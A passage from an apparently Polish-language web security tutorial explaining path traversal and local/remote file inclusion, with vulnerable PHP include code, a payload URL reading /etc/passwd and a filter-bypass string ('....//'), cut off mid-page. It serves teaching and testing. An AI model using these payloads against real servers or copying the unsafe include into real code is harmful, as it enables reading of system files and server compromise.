<pre class="wp-block-code"><code class="">http://example.com/image?avatar=img678.png</code></pre>



<p class="wp-block-paragraph">Tak może wyglądać kod po stronie podatnej aplikacji:</p>



<pre class="wp-block-code"><code class="">&lt;?php
$file = $_GET['avatar'];
include('var/www/images/' . $file);
?&gt;</code></pre>



<p class="wp-block-paragraph">Parametr <code>file</code> określa który plik graficzny ma się wyświetlać danemu użytkownikowi. W normalnych warunkach powinna się wyświetlić grafika, której nazwa znajduje się w adresie URL w parametrze <code>avatar</code>.</p>



<p class="wp-block-paragraph">Jednak kod jest podatny na ataki path traversal, ponieważ łączy dane wejściowe dostarczone przez użytkownika ze ścieżką do pliku bez odpowiedniej walidacji. Atakujący może łatwo wykorzystać tę lukę, dostarczając ładunek, taki jak np. <code>../../../etc/passwd</code>, który umożliwia przechodzenie w górę hierarchii katalogów i uzyskiwanie dostępu do poufnych plików na serwerze. Ponieważ aplikacja nie jest odpowiednio zabezpieczona, atakujący może zmodyfikować powyższy adres zmieniając parametr <code>avatar</code> w poniższy sposób:</p>



<pre class="wp-block-code"><code class="">http://example.com/image?avatar=../../../etc/passwd</code></pre>



<p class="wp-block-paragraph">Zmanipulowany kod po stronie serwera wyglądałby następująco:</p>



<pre class="wp-block-code"><code class="">&lt;?php
$file ='../../../etc/passwd';
include('var/www/images/' . $file);
?&gt;</code></pre>



<p class="wp-block-paragraph">W efekcie serwer wskazuje pod adres:</p>



<pre class="wp-block-code"><code class="">/var/www/images/../../../etc/passwd</code></pre>



<p class="wp-block-paragraph">Znak <code>../</code> oznacza przejście do katalogu nadrzędnego, tak więc w rezultacie serwer wyświetli zawartość pliku <code>etc/passwd</code>, zamiast grafiki z awatarem.</p>



<p class="wp-block-paragraph">Jeśli nie zapewnimy odpowiedniej walidacji przekazywanych danych do naszej aplikacji, ostatnią deską ratunku będą odpowiednio niskie uprawnienia. Jeśli będą one zbyt wysokie, wtedy atakujący z powodzeniem wykona swój atak.</p>



<h2 class="wp-block-heading">Czym jest File Inclusion</h2>



<p class="wp-block-paragraph"><strong>File Inclusion</strong> to rodzaj podatności, która pozwala atakującym na dołączenie i wykonanie kodu z plików (lokalnych lub zdalnych) w kontekście aplikacji. Często występuje w językach programowania takich jak PHP, gdzie funkcje dołączające pliki (np. include(), require()) są źle zabezpieczone. Wyróżnia się dwa rodzaje podatności <strong>File Inclusion</strong>:</p>



<ul class="wp-block-list">
<li><strong>Local File Inclusion (LFI) </strong>&#8211; to luka w zabezpieczeniach aplikacji, która polega na wyświetleniu zawartości plików lub wykonaniu kodu z plików znajdujących się lokalnie na serwerze. LFI może prowadzić do dalszej eskalacji ataku. Atakujący może nawet przejąć kontrolę nad serwerem.</li>



<li><strong>Remote File Inclusion (RFI)</strong> &#8211; to luka, która pozwala atakującemu na dołączenie i wykonanie kodu z plików znajdujących się na zdalnym serwerze. W przypadku gdy aplikacja jest źle skonfigurowana (np. funkcja allow_url_include w PHP jest włączona), plik zostanie pobrany i wykonany w kontekście serwera aplikacji. W ten sposób można uruchomić złośliwy kod, który pozwala na kradzież danych, wykonanie dowolnych poleceń lub nawet przejęcie kontroli nad serwerem.</li>
</ul>



<h2 class="wp-block-heading">Jaka jest różnica pomiędzy Path Traversal a File Inclusion</h2>



<ol class="wp-block-list">
<li><strong>Charakter podatności</strong><br>Path Traversal umożliwia atakującemu odczyt plików i katalogów do których nie powinien mieć dostępu. <br>Natomiast File Inclusion pozwala na dołączanie lub wykonywanie i odczytywanie dowolnych plików z lokalnego lub zdalnego serwera.</li>



<li><strong>Wpływ na serwer</strong><br>Path Traversal umożliwia atakującemu dostęp do poufnych plików i katalogów na serwerze. Może to prowadzić do kradzieży danych lub nawet przejęcia serwera.<br>File Inclusion umożliwia atakującemu wykonanie dowolnego kodu z pliku na serwerze. Prowadzi to do całkowitego naruszenia bezpieczeństwa serwera.</li>



<li><strong>Skutek</strong><br>Obie podatności mogą nieść ze sobą poważne skutki. Jednak przyjmuje się, że File Inclusion jest poważniejsza z uwagi na możliwość wykonania dowolnego kodu na serwerze.</li>



<li><strong>Przyczyna</strong><br>Zarówno Path Traversal, jak i File Inclusion mogą być spowodowane przez niewystarczającą walidację oraz brak odpowiedniej kontroli dostępu. Path Traversal występuje, gdy aplikacja nie może zweryfikować danych wejściowych użytkownika używanych do uzyskania dostępu do systemu plików, natomiast File Inclusion występuje, gdy dane wejściowe użytkownika są używane do dołączenia plików ze zdalnego lub lokalnego serwera bez odpowiedniej walidacji.</li>
</ol>



<h2 class="wp-block-heading">Jak ominąć filtry</h2>



<p class="wp-block-paragraph">Path Traversal jest znaną i dość popularną podatnością i w związku z tym oprogramowania klasy IDS (ang. <em>Intrusion Detection System</em>), czyli systemy wykrywania włamań, wykrywają i skutecznie unicestwiają znane ataki, poprzez usuwanie z zapytań ciągów<strong> <code>../</code></strong> oraz ich wariacji. Poniżej opisuję kilka sposobów na ominięcie filtrów.</p>



<h3 class="wp-block-heading">Użycie wariacji znaków . / \</h3>



<p class="wp-block-paragraph">Jeśli system ochrony usuwa tylko raz z zapytania sekwencję <strong><code>../</code></strong>, bez ponownego sprawdzenia przekazanego ciągu zapytania, jest możliwe ominięcie zabezpieczeń dodając dodatkowe znaki kropek i ukośników. Takie zapytanie może mieć wtedy postać:</p>



<pre class="wp-block-code"><code class="">....//....//....//etc/passwd</code></pre>



<p class="wp-block-paragraph">Sekwencje w czerwonych ramkach na poniższym zrzucie są usuwane przez system zabezpieczający:</p>



<figure class="wp-block-image size-full is-resized"><a href="https://pentestuj.pl/wp-content/uploads/2024/11/path-traversal-portswigger.png"><img loading="lazy" decoding="async" width="800" height="211" src="https://pentestuj.pl/wp-content/uploads/2024/11/path-traversal-portswigger.png" alt="Co to jest path traversal" class="wp-image-15050" style="width:600px" srcset="https://pentestuj.pl/wp-content/uploads/2024/11/path-traversal-portswigger.png 800w, https://pentestuj.pl/wp-content/uploads/2024/11/path-traversal-portswigger-300x79.png 300w, https://pentestuj.pl/wp-content/uploads/2024/11/path-traversal-portswigger-768x203.png 768w" sizes="auto, (max-width: 800px) 100vw, 800px" data-mwl-img-id="15050" /></a></figure>



<p class="wp-block-paragraph">Po usunięciu powyższych znaków otrzymujemy zapytanie jak na poniższym rzucie:</p>



<figure class="wp-block-image size-full is-resized"><a href="https